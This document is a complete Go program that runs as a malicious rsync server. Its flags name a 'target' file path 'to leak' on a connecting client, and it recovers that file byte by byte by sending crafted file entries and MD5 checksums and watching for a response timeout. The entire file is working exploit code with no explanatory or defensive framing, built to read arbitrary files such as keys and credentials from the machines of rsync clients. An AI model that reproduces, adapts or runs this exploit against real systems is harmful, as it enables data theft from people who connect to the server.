package main

import (
	"crypto/md5"
	"encoding/binary"
	"fmt"
	"net"
	"os"
	"strconv"
	"time"

	"flag"
)

const mPlexBase = 7
const msgDataTag = 0

const xmitLongName = (1 << 6)

const itemBasisTypeFollows = (1 << 11)
const itemXNameFollows = (1 << 12)
const itemTransfer = (1 << 15)

const fileMode = 040000
const dirMode = 0100000

const fNameCmpFuzzy = 0x83

const ndxDone = -1

const cSumLength = 16
const bigBufferSize = 4096 + 1024

var port = flag.Int("port", 8080, "Port to listen on")
var targetFile = flag.String("target", "", "File path to leak")
var leakSize = flag.Int("size", 0, "Size to leak from file")

func getMsg(tag int, data []byte, length int) []byte {
	msg := make([]byte, 0)

	tl := uint32(((tag + mPlexBase) << 24) + length)

	msg = binary.LittleEndian.AppendUint32(msg, tl)

	msg = append(msg, data[:length]...)

	return msg
}

func getVarInt(num uint32) []byte {
	b := make([]byte, 1)
	b = binary.LittleEndian.AppendUint32(b, num)
	count := byte(4)

	for count = 4; count > 1 && b[count] == 0; count-- {
	}
	bit := byte(1 << (7 - count + 1))

	if b[count] >= bit {
		count++
		b[0] = (^bit - 1)
	} else if count > 1 {
		b[0] = b[count] | ^(bit*2 - 1)
	} else {
		b[0] = b[1]
	}

	return b[:count]
}

type ndxCtx struct {
	prevPositiveOutbound int
	prevNegativeOutbound int
	prevPositiveInbound  int
	prevNegativeInbound  int
}

func writeNdx(conn net.Conn, ndx int, ctx *ndxCtx) {
	// state of the current reduction
	diff := 0
	cnt := 0
	b := make([]byte, 6)

	if ndx >= 0 {
		diff = ndx - ctx.prevPositiveOutbound
		ctx.prevPositiveOutbound = ndx
	} else if ndx == ndxDone {
		conn.Write(getMsg(msgDataTag, make([]byte, 1), 1))
		return
	} else {
		b[cnt] = 0xff
		cnt++
		ndx = -ndx
		diff = ndx - ctx.prevNegativeOutbound
		ctx.prevNegativeOutbound = ndx
	}

	if diff < 0xFE && diff > 0 {
		b[cnt] = byte(diff)
		cnt++
	} else if diff < 0 || diff > 0x7FFF {
		b[cnt] = byte(0xFE)
		cnt++
		b[cnt] = byte(ndx>>24) | 0x80
		cnt++
		b[cnt] = byte(ndx)
		cnt++
		b[cnt] = byte(ndx >> 8)
		cnt++
		b[cnt] = byte(ndx >> 16)
		cnt++
	} else {
		b[cnt] = 0xFE
		cnt++
		b[cnt] = byte(diff >> 8)
		cnt++
		b[cnt] = byte(diff)
		cnt++
	}

	data := b[:cnt]
	conn.Write(getMsg(msgDataTag, data, len(data)))
	return
}

func sendEntry(conn net.Conn, fileName string, entryMode uint32) {
	data := make([]byte, 4096)
	// flist flags
	data[0] = xmitLongName
	conn.Write(getMsg(msgDataTag, data, 1))

	// Filename
	name := []byte(fileName)
	fileNameLength := getVarInt(uint32(len(name)))
	conn.Write(getMsg(msgDataTag, fileNameLength, len(fileNameLength)))
	conn.Write(getMsg(msgDataTag, name, len(name)))

	// Right now we just do 0 since we don't have varlong30 implemented
	// File Length
	data[0] = 0
	data[1] = 0
	data[2] = 0
	data[3] = 0
	conn.Write(getMsg(msgDataTag, data, 3))

	// modtime
	conn.Write(getMsg(msgDataTag, data, 4))

	// Mode
	mode := make([]byte, 0)
	mode = binary.LittleEndian.AppendUint32(mode, entryMode)
	conn.Write(getMsg(msgDataTag, mode, 4))
}

func sendFileEntry(conn net.Conn, fileName string, fileMode uint32, blen uint32, csum [cSumLength]byte) {
	// iflags
	iflags := make([]byte, 0)
	iflags = binary.LittleEndian.AppendUint16(iflags, itemTransfer|itemBasisTypeFollows|itemXNameFollows)
	conn.Write(getMsg(msgDataTag, iflags, len(iflags)))

	// compare type
	cmp := make([]byte, 1)
	cmp[0] = fNameCmpFuzzy
	conn.Write(getMsg(msgDataTag, cmp, 1))

	// Target file
	target := []byte(*targetFile)
	tlen := make([]byte, 1)
	tlen[0] = byte(len(target))
	conn.Write(getMsg(msgDataTag, tlen, 1))
	conn.Write(getMsg(msgDataTag, target, len(target)))

	// in receive_data
	// send head
	// count
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))
	// blength
	blength := make([]byte, 0)
	blength = binary.LittleEndian.AppendUint32(blength, blen)
	conn.Write(getMsg(msgDataTag, blength, 4))
	conn.Write(getMsg(msgDataTag, blength, 4))
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))

	// Send token -1 to copy from target
	token := make([]byte, 0)
	token = binary.LittleEndian.AppendUint32(token, 0xffffffff)
	conn.Write(getMsg(msgDataTag, token, 4))

	// 0 to finish
	conn.Write(getMsg(msgDataTag, make([]byte, 4), 4))

	// Send checksum
	conn.Write(getMsg(msgDataTag, csum[:], cSumLength))
	return
}

// We only support MD5.
func getCsum(data []byte) [cSumLength]byte {
	csum := md5.Sum(data)
	return csum
}

func handleConnection(conn net.Conn) {
	fmt.Println("Connection from:", conn.RemoteAddr())

	data := make([]byte, bigBufferSize)

	// Prologue
	conn.Write([]byte("@RSYNCD: 30.0 sha1\n"))
	conn.Write([]byte("files\n"))
	conn.Write([]byte("@RSYNCD: OK\n"))

	// compat flags
	msg := getMsg(msgDataTag, data, 1)
	conn.Write(msg)

	fmt.Printf("[+] Sending file entry: %d files\n", *leakSize*256)

	for i := 0; i < 256**leakSize; i++ {
		fname := fmt.Sprintf("%03d/", i)
		sendEntry(conn, fname, dirMode)
	}

	// err?
	data[0] = 0
	conn.Write(getMsg(msgDataTag, data, 1))

	// Drain input
	conn.Read(data)

	ctx := ndxCtx{}
	leaked := make([]byte, *leakSize)
	ndx := 2

	fmt.Printf("[+] Starting to leak %s\n", *targetFile)
	for i := 0; i < *leakSize; i++ {
		found := false
		for j := 0; j < 256; j++ {
			writeNdx(conn, ndx, &ctx)
			ndx++
			leaked[i] = byte(j)
			csum := getCsum(leaked[:i+1])
			sendFileEntry(conn, "leak", fileMode, uint32(i+1), csum)

			// We determine if the server sent data or not with a timeout.
			conn.SetReadDeadline(time.Now().Add(1 * time.Second))
			_, err := conn.Read(data)

			if err != nil {
				if netErr, ok := err.(net.Error); ok && netErr.Timeout() {
					fmt.Printf("[+] Leaked: %02x\n", j)
					found = true
					break
				} else {
					fmt.Println(err)
					return
				}
			}
		}

		if !found {
			fmt.Printf("[-] Failed to leak byte. Total bytes leaked %d\n\n", i)

			// Print any data we already leaked.
			if i > 0 {
				fmt.Printf("%s\n", string(leaked))
			}
			return
		}
	}

	fmt.Printf("[+] Leaked %d bytes from %s\n\n", *leakSize, *targetFile)
	fmt.Println("---")
	fmt.Printf("%s\n", string(leaked))

	return
}

func main() {
	flag.Parse()
	if *targetFile == "" || *leakSize == 0 {
		fmt.Println("--target and --size are required")
		os.Exit(-1)
	}

	ln, err := net.Listen("tcp", ":"+strconv.Itoa(*port))

	if err != nil {
		fmt.Println("Error listening:", err)
		return
	}

	defer ln.Close()

	fmt.Println("Listening on port " + strconv.Itoa(*port))

	for {
		conn, err := ln.Accept()
		if err != nil {
			fmt.Println("Error accepting connection:", err)
			continue
		}

		go handleConnection(conn)
	}
}
